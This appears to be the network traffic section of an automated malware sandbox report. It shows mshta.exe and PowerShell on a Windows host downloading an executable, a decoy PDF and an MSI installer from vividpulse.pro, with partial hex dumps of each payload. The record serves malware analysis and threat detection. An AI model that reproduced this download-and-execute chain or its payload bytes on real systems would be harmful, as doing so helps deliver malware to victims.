                                          Dec 31, 2024 10:38:09.212204933 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212228060 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212253094 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212392092 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212414026 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212445974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212452888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212482929 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212501049 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212671995 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212687016 CET4434974392.113.18.193192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 10:38:02.040038109 CET | 51194 | 53 | 192.168.2.6 | 1.1.1.1
Dec 31, 2024 10:38:02.079327106 CET | 53 | 51194 | 1.1.1.1 | 192.168.2.6
Dec 31, 2024 10:38:16.592427015 CET | 60990 | 53 | 192.168.2.6 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 10:38:02.040038109 CET | 192.168.2.6 | 1.1.1.1 | 0x7020 | Standard query (0) | vividpulse.pro | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:16.592427015 CET | 192.168.2.6 | 1.1.1.1 | 0x7c1c | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 10:38:02.079327106 CET | 1.1.1.1 | 192.168.2.6 | 0x7020 | No error (0) | vividpulse.pro | | 92.113.18.193 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:16.604393005 CET | 1.1.1.1 | 192.168.2.6 | 0x7c1c | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 10:38:17.353905916 CET | 1.1.1.1 | 192.168.2.6 | 0xbed1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:17.353905916 CET | 1.1.1.1 | 192.168.2.6 | 0xbed1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:32.888923883 CET | 1.1.1.1 | 192.168.2.6 | 0x82c6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:32.888923883 CET | 1.1.1.1 | 192.168.2.6 | 0x82c6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:44.987284899 CET | 1.1.1.1 | 192.168.2.6 | 0xf065 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:38:44.987284899 CET | 1.1.1.1 | 192.168.2.6 | 0xf065 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:09.049134970 CET | 1.1.1.1 | 192.168.2.6 | 0x861 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:09.049134970 CET | 1.1.1.1 | 192.168.2.6 | 0x861 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:33.112658024 CET | 1.1.1.1 | 192.168.2.6 | 0x2bcd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:33.112658024 CET | 1.1.1.1 | 192.168.2.6 | 0x2bcd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:57.220911026 CET | 1.1.1.1 | 192.168.2.6 | 0x9bab | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 10:39:57.220911026 CET | 1.1.1.1 | 192.168.2.6 | 0x9bab | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                          • vividpulse.pro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 92.113.18.193 | 443 | 4372 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 09:38:03 UTC | 328 | OUT | GET /Seed/Havoc HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-CH
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                          Host: vividpulse.pro
                                          Connection: Keep-Alive
2024-12-31 09:38:03 UTC | 575 | IN | HTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=604800
                                          expires: Tue, 07 Jan 2025 09:38:03 GMT
                                          last-modified: Mon, 30 Dec 2024 12:27:14 GMT
                                          etag: "70cd3-677291a2-bc38a2d59ab89e42;;;"
                                          accept-ranges: bytes
                                          content-length: 462035
                                          date: Tue, 31 Dec 2024 09:38:03 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                          2024-12-31 09:38:03 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                          2024-12-31 09:38:03 UTC16384INData Raw: cc cc cc 8b ff 55 8b ec 51 8b 45 08 53 56 8b f1 57 89 86 a4 00 00 00 8b 45 0c 89 86 a8 00 00 00 ff 15 94 21 41 00 ff 75 18 8b 86 a4 00 00 00 33 db 53 53 53 ff 70 04 8b ce ff 15 a4 21 41 00 8b f8 85 ff 0f 88 ce 00 00 00 6a 01 8b ce ff 15 94 20 41 00 8b f8 85 ff 0f 88 ba 00 00 00 6a 01 8b ce ff 15 98 20 41 00 8b f8 85 ff 0f 88 a6 00 00 00 8b 8e a4 00 00 00 56 ff 15 48 21 41 00 6a 01 8b ce ff 15 24 21 41 00 8d 45 fc 50 ff 15 bc 20 41 00 8b f8 85 ff 78 7f ff 75 fc 8b ce ff 15 9c 20 41 00 8b f8 85 ff 79 0b 8b 4d fc ff 15 c0 20 41 00 eb 63 6a 10 bf 05 40 00 80 e8 c3 9c 00 00 8b d0 59 85 d2 74 14 8b 8e a4 00 00 00 8b 49 04 89 5a 04 89 5a 08 89 4a 0c eb 02 8b d3 89 96 ac 00 00 00 85 d2 74 30 53 8d 45 fc 8b ca 50 0f b7 45 10 53 56 68 90 16 40 00 50 ff b6 a8 00 00
                                          Data Ascii: UQESVWE!Au3SSSp!Aj Aj AVH!Aj$!AEP Axu AyM Acj@YtIZZJt0SEPESVh@P
                                          2024-12-31 09:38:03 UTC16384INData Raw: 10 6a 2d 59 e8 3e de ff ff ff b5 dc fd ff ff ff 15 6c 22 41 00 83 f8 ff 74 37 6a 0e 68 e8 21 40 00 8b cb e8 72 04 00 00 ff b5 dc fd ff ff ff 15 68 22 41 00 a1 38 10 41 00 3b c7 74 14 f6 40 1c 10 74 0e ff 70 14 ff 70 10 6a 2e 59 e8 f6 dd ff ff 8b 8d dc fd ff ff 33 ff 8d 49 f0 e8 6a b4 ff ff 8b 8d d8 fd ff ff 8d 49 f0 e8 5c b4 ff ff 8b 8d d4 fd ff ff 8d 49 f0 e8 4e b4 ff ff 83 bd c4 fd ff ff 00 74 0c ff b5 c4 fd ff ff ff 15 64 20 41 00 8d 4e f0 e8 31 b4 ff ff 8d 8d ac fd ff ff e8 b7 05 00 00 8b c7 e8 06 6b 00 00 c2 0c 00 cc cc cc cc cc cc 6a 00 b8 ac fd 40 00 e8 1b 6b 00 00 8b 45 08 85 c0 74 38 8b 00 ba 08 22 40 00 66 8b 30 33 c9 41 66 3b 32 75 1e 66 85 f6 74 15 66 8b 70 02 66 3b 72 02 75 0f 83 c0 04 83 c2 04 66 85 f6 75 db 33 c0 eb 04 1b c0 0b c1 85 c0 74
                                          Data Ascii: j-Y>l"At7jh!@rh"A8A;t@tppj.Y3IjI\INtd AN1kj@kEt8"@f03Af;2uftfpf;rufu3t
                                          2024-12-31 09:38:03 UTC16384INData Raw: dd 85 c0 fe ff ff dc 4d b0 de c1 d9 18 d9 85 1c ff ff ff d9 58 04 d9 85 18 ff ff ff d9 58 08 d9 85 14 ff ff ff d9 58 0c d9 85 10 ff ff ff d9 58 10 d9 85 0c ff ff ff d9 58 14 d9 85 08 ff ff ff d9 58 18 d9 85 e0 fe ff ff d9 58 1c d9 85 04 ff ff ff d9 58 20 d9 85 00 ff ff ff d9 58 24 d9 85 fc fe ff ff d9 58 28 d9 85 f8 fe ff ff d9 58 2c d9 85 f4 fe ff ff d9 58 30 d9 85 f0 fe ff ff d9 58 34 d9 85 ec fe ff ff d9 58 38 d9 85 e4 fe ff ff d9 58 3c d9 85 e8 fe ff ff d9 58 40 d9 85 d0 fe ff ff d9 58 44 d9 85 d4 fe ff ff d9 58 48 d9 85 d8 fe ff ff d9 58 4c d9 85 dc fe ff ff d9 58 50 d9 45 f4 d9 58 54 d9 45 ec d9 58 58 d9 45 e4 d9 58 5c d9 45 fc d9 58 60 c9 c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 60 d9 42 04 d8 05 44 16 41 00 8b 45 08 d9 5d fc d9 42 08 d8 05
                                          Data Ascii: MXXXXXXXX X$X(X,X0X4X8X<X@XDXHXLXPEXTEXXEX\EX`U`BDAE]B
                                          2024-12-31 09:38:03 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 40 1c 41 00 40 16 40 00 48 16 40 00 38 10 41 00 00 00 00 00 84 28 40 00 32 00 00 00 33 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 9c 28 40 00 42 00 00 00 43 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 b8 28 40 00 36 00 00 00 37 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 cc 28 40 00 40 00 00 00 41 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 e4 28 40 00 3a 00 00 00 3b 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 fc 28 40 00 34 00 00 00 35 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 14 29 40 00 10 20 00 00 11 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 38 29 40 00 0e 20 00 00 0f 20 00 00 01 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: @A@@H@8A(@23(@BC(@67(@@A0(@:;(@45)@ 8)@
                                          2024-12-31 09:38:03 UTC16384INData Raw: 4d 00 55 00 49 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 10 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: MUIen-US
                                          2024-12-31 09:38:03 UTC16384INData Raw: 68 ff ff ff e8 dd 02 00 00 8b 45 1c 8b 8d dc fe ff ff 89 85 3c ff ff ff 8d 85 2c ff ff ff 50 89 9d 40 ff ff ff 89 b5 44 ff ff ff 89 9d 48 ff ff ff e8 b0 02 00 00 8b 45 14 89 85 1c ff ff ff 89 9d 20 ff ff ff 89 b5 24 ff ff ff 89 9d 28 ff ff ff 8b 45 10 89 9d 10 ff ff ff c7 85 14 ff ff ff 08 00 00 00 89 9d 18 ff ff ff 8b 00 89 85 0c ff ff ff 8d 85 ec fe ff ff 50 6a 11 53 53 ff b5 d8 fe ff ff ff b5 d4 fe ff ff e8 a3 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 65 b0 00 00 c9 c2 44 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 60 01 00 00 a1 04 13 41 00 33 c5 89 45 fc 8b 45 18 89 85 a8 fe ff ff 8b 45 20 89 85 ac fe ff ff 8b 45 28 53 8b 5d 3c 89 85 b0 fe ff ff 8b 45 30 56 8b 75 48 89 85 b4 fe ff ff 8b 45 38 57 8b 7d 44 89 85 b8 fe ff ff 8d 45 ec 89 8d a0 fe ff ff 8b 4d 54
                                          Data Ascii: hE<,P@DHE $(EPjSSM_^3[eDU`A3EEE E(S]<E0VuHE8W}DEMT
                                          2024-12-31 09:38:03 UTC16384INData Raw: f0 e8 b1 cc ff ff 8d 57 48 c6 45 fc 01 8d 4d f0 e8 50 02 00 00 8b ce ba 20 14 41 00 f7 d9 1b c9 81 c1 02 00 00 80 85 f6 75 05 ba a0 13 41 00 8b 75 f0 56 68 58 13 41 00 e8 4f fe ff ff 8d 4e f0 c6 45 fc 00 e8 82 c4 ff ff 8b 75 e8 85 f6 74 42 68 78 12 41 00 8d 4d f0 e8 5a cc ff ff c6 45 fc 02 84 db 74 03 83 c7 18 8b d7 8d 4d f0 e8 f3 01 00 00 8b 75 f0 ba 20 14 41 00 56 68 84 13 41 00 b9 01 00 00 80 e8 02 fe ff ff 8d 4e f0 e8 39 c4 ff ff 8b 75 ec 8d 4d e0 e8 f0 24 00 00 8b c6 e8 f4 7a 00 00 c3 cc cc cc cc cc cc 6a 1c b8 eb fb 40 00 e8 25 7b 00 00 8b f9 33 db 8d 4d e4 53 68 90 1f 40 00 89 5d ec e8 79 24 00 00 89 5d fc 89 5d d8 89 5d dc 89 5d e0 8d 4d f0 c6 45 fc 01 e8 53 67 00 00 68 06 00 02 00 8d 4d d8 ff 30 68 02 00 00 80 e8 53 e8 ff ff 8b 4d f0 8b f0 83 c1
                                          Data Ascii: WHEMP AuAuVhXAONEutBhxAMZEtMu AVhAN9uM$zj@%{3MSh@]y$]]]]MESghM0hSM
                                          2024-12-31 09:38:03 UTC16384INData Raw: 3b d0 74 10 66 89 3a 03 d7 3b d0 75 f7 8b 56 10 85 d2 74 60 85 db 8b fa 8b 5d 08 74 2c 0f b7 46 14 6b c8 2c 03 ca 3b d1 74 1f 8b 7e 0c 83 c2 08 39 7a fc 76 07 8b 02 3b 43 08 74 38 83 c2 2c 8d 42 f8 3b c1 75 ea 8b 7e 10 0f b7 46 16 33 d2 0f b7 4e 14 40 f7 f1 0f b7 c2 33 d2 6b c8 2c 42 66 89 46 16 8b 46 08 03 cf f0 0f c1 10 42 52 53 e8 b4 fd ff ff 5f 5e 5b 5d c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 53 56 8b 35 ec 1c 41 00 33 db 57 8b fb 85 f6 74 51 39 5e 04 75 1c 8b 0e 8d 55 fc 89 5d fc e8 87 15 00 00 85 c0 78 0b 39 5e 04 75 06 8b 45 fc 89 46 04 8b 76 04 8d 46 10 f7 de 1b f6 23 f0 74 22 ff 15 e0 22 41 00 6a 0a 59 33 d2 8b f8 f7 f1 8b 4c 96 08 eb 07 39 39 74 10 8b 49 04 85 c9 75 f5 8b fb 8b c7 5f 5e 5b c9 c3 83 c1 08 8b f9 74 f2 39 59 08 75 ed 8d 46 04
                                          Data Ascii: ;tf:;uVt`]t,Fk,;t~9zv;Ct8,B;u~F3N@3k,BfFFBRS_^[]UQSV5A3WtQ9^uU]x9^uEFvF#t""AjY3L99tIu_^[t9YuF
                                          2024-12-31 09:38:03 UTC16384INData Raw: 04 41 00 e9 46 fb ff ff cc cc cc cc cc cc 8d 4d f0 e9 15 4c ff ff 8d 4d ec e9 0d 4c ff ff 8d 4d d4 e9 6d 69 ff ff 8d 4d e0 e9 fd 4b ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a cc 33 c8 e8 ba f0 ff ff b8 ac 04 41 00 e9 fe fa ff ff cc cc cc cc cc cc 8d 8d d4 fd ff ff e9 2c a5 ff ff 8d 8d e8 fd ff ff e9 2c 85 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a d0 fd ff ff 33 c8 e8 79 f0 ff ff 8b 4a fc 33 c8 e8 6f f0 ff ff b8 f0 04 41 00 e9 b3 fa ff ff cc cc cc cc cc cc 8d 4d f0 e9 ef 84 ff ff 8d 4d ec e9 e7 84 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 7c ff ff ff 33 c8 e8 34 f0 ff ff b8 24 05 41 00 e9 78 fa ff ff cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 11 f0 ff ff b8 74 02 41 00 e9 55 fa ff ff cc cc cc cc cc cc
                                          Data Ascii: AFMLMLMmiMKT$BJ3A,,T$B3yJ3oAMMT$B|34$AxT$BJ3tAU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49731 | 92.113.18.193 | 443 | 6892 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 09:38:06 UTC | 84 | OUT | GET /Fox/API%20_Guide.pdf HTTP/1.1
                                          Host: vividpulse.pro
                                          Connection: Keep-Alive
2024-12-31 09:38:07 UTC | 427 | IN | HTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=2592000
                                          expires: Thu, 30 Jan 2025 09:38:07 GMT
                                          content-type: application/pdf
                                          last-modified: Mon, 30 Dec 2024 11:56:40 GMT
                                          etag: "e6cd-67728a78-6322ff7f0aa90657;;;"
                                          accept-ranges: bytes
                                          content-length: 59085
                                          date: Tue, 31 Dec 2024 09:38:07 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          2024-12-31 09:38:07 UTC16384INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 63 61 20 31 0a 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 41 20 31 0a 2f 63 61 20 31 0a 2f 4c 43 20 30 0a 2f 4c 4a 20 30 0a 2f 4c 57 20 33 0a 2f 4d 4c 20 34 0a 2f 53 41 20 74 72 75 65 0a 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23
                                          Data Ascii: %PDF-1.4%11 0 obj<</ca 1/BM /Normal>>endobj12 0 obj<</CA 1/ca 1/LC 0/LJ 0/LW 3/ML 4/SA true/BM /Normal>>endobj14 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#
                                          2024-12-31 09:38:07 UTC16384INData Raw: e5 77 ec 66 e6 0f 47 77 f3 9d cb e3 77 54 c1 09 34 9d 75 47 2d fa 67 77 54 bd 51 07 2b 33 2d ea 5b ea a7 94 ee 16 5f 7d ef 75 f1 9e 4f d5 98 fa e6 2b 22 d7 1c cb 64 fe 84 7f c3 51 e6 5d 3c c9 02 f1 3c 03 4e 9a 84 df b2 26 31 f8 a5 20 96 b1 3c 61 f8 5e 96 ea 47 ea 87 65 98 cd 19 26 01 84 3e 15 b2 31 9e e5 48 c2 83 68 95 fa 06 94 7d 3f a7 45 4f db 9e a1 53 d4 53 b4 54 7d fd 65 1b 33 9b b1 a8 b7 d3 4b 63 7f 89 9d a0 b7 e1 49 99 50 ff ed 84 93 32 f1 fb b2 14 8e 41 17 e2 f0 8b 08 90 28 e4 bf 7e fd 34 fc 8d 92 26 d3 12 0e 2d 3a 93 88 66 28 e7 51 a0 19 ce c2 79 14 ed 19 2e 9d 70 0b 07 2e 69 1a 23 ef df 94 ef ce c8 ae 2f 0c 84 e6 66 a9 0b 68 1e cd c8 a2 29 34 47 ad a9 d8 be ff 0a d5 9d 99 f1 2b 61 92 49 6e 5d c0 6d 89 51 66 64 78 cd 2d fb db 81 96 d5 23 1f d3 93
                                          Data Ascii: wfGwwT4uG-gwTQ+3-[_}uO+"dQ]<<N&1 <a^Ge&>1Hh}?EOSST}e3KcIP2A(~4&-:f(Qy.p.i#/fh)4G+aIn]mQfdx-#
                                          2024-12-31 09:38:07 UTC16384INData Raw: dd f1 3d 77 1c 9a 3f cf da e5 bc bb ee 18 e9 0d 86 95 4c 52 e5 ce 82 f3 3e c5 8d d7 99 60 0d 59 9d 30 b8 eb 4a 5e dd 16 88 cb b5 8c fb 14 8f 2d 16 67 96 f9 8d c7 2e 15 7c 97 f3 50 a6 88 31 24 ab ea 0f e7 c8 4c 00 72 47 db 59 71 b8 79 04 23 65 dd c5 a4 ba e2 3b 8d 2a b9 a1 76 be 85 ac ab 84 75 09 67 9f 0d 58 be 12 e6 f3 7b 5d 8b fb 8f d7 99 0b ce 20 8b 47 aa 55 ed c2 1b 14 f5 5d ae 06 e4 85 64 70 d4 9d a8 d6 9d 38 bd 45 8e ac aa 1b 8b 70 b7 25 9b d5 65 81 bc 15 18 e7 61 7a 4d 46 53 5c bb 75 76 7f 52 39 ff 2a 1e a5 ec d2 0c 5f 30 02 ca f5 55 e3 d5 e1 93 2b f1 88 ca 58 11 d2 2d e2 74 f5 d8 87 76 e6 b9 e1 3a f1 f0 4a 5b 45 86 f7 4e 6f dc 87 40 71 12 46 b4 8f 2f cd f5 cf 20 6e ff 3c fb 26 33 a8 44 bb ab 5d 20 a0 1b 77 b5 68 71 40 fb be b9 7e fe dc fd 54 00 d2
                                          Data Ascii: =w?LR>`Y0J^-g.|P1$LrGYqy#e;*vugX{] GU]dp8Ep%eazMFS\uvR9*_0U+X-tv:J[ENo@qF/ n<&3D] whq@~T
                                          2024-12-31 09:38:07 UTC9933INData Raw: fe 3e 49 6d 15 dd 1d 9b 0a 29 e6 b6 e6 2b 92 16 c4 9e 45 30 32 77 90 9c 32 3c 15 ad a4 8d e5 e4 01 ee d3 53 26 58 c6 35 f5 92 3e ec 61 19 db 2d 2c a3 87 1f 60 19 7b 76 b0 2c c3 0e 96 95 d8 c3 32 b6 77 b0 8c ed 16 96 b1 79 80 65 ec d9 c1 b2 da 10 43 41 0b cb b1 33 43 4c 7e 20 83 50 25 99 61 2a cf b9 81 58 e6 28 83 5c e5 38 a3 60 12 29 83 64 96 38 c3 68 d5 49 06 da a4 34 51 d5 b9 7e 4c b0 2c dd 1e 96 b1 bd 83 65 69 8f b0 8c 3d 3b 58 c6 76 0b cb b1 c8 d9 c2 32 b6 77 b0 8c ed 1d 2c 63 fb 00 cb d2 ec 61 79 bd 0a b0 fe 69 60 79 ed 4c 56 c9 0f 24 b3 55 8a d9 ae 79 ce cd ea 99 a3 ec 15 95 e3 e2 36 76 07 cb 59 e2 e2 77 f6 08 cb 59 6b b6 2a d4 26 25 93 b0 ac f2 51 4f c8 0c 13 56 76 0f 6f bb 33 d0 5c 4a 91 58 6f 53 99 11 10 22 ad 65 50 20 86 71 da 97 c4 a0 39 b4 16
                                          Data Ascii: >Im)+E02w2<S&X5>a-,`{v,2wyeCA3CL~ P%a*X(\8`)d8hI4Q~L,ei=;Xv2w,cayi`yLV$Uy6vYwYk*&%QOVvo3\JXoS"eP q9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49743 | 92.113.18.193 | 443 | 6892 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 09:38:08 UTC | 60 | OUT | GET /Quantum/XZJKPUBX.msi HTTP/1.1
                                          Host: vividpulse.pro
2024-12-31 09:38:08 UTC | 439 | IN | HTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=604800
                                          expires: Tue, 07 Jan 2025 09:38:08 GMT
                                          content-type: application/octet-stream
                                          last-modified: Mon, 30 Dec 2024 11:57:29 GMT
                                          etag: "169000-67728aa9-c41cbf708bce13d1;;;"
                                          accept-ranges: bytes
                                          content-length: 1478656
                                          date: Tue, 31 Dec 2024 09:38:08 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          2024-12-31 09:38:08 UTC16384INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                          Data Ascii: >
                                          2024-12-31 09:38:08 UTC16384INData Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 cc 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c8 00 00 00 06 00 00 00 dc 00 00 00 07 00 00 00 38 01 00 00 09 00 00 00 4c 01 00 00 0c 00 00 00 7c 01 00 00 0d 00 00 00 88 01 00 00 0e 00 00 00 94 01 00 00 0f 00 00 00 9c 01 00 00 12 00 00 00 a4 01 00 00 13 00 00 00 c4 01 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 16 00 00 00 49 6e 73 74 61 6c 6c 61 74 69 6f 6e 20 44 61 74 61 62 61 73 65 00 00 00 1e 00 00 00 08 00 00 00 56 65 74 65 72 61 6e 00 1e 00 00 00 0f 00 00 00 43 68 61 70 6d 61 6e 20 46 61 71 75 69 72 00 00 1e 00 00 00 0a 00 00
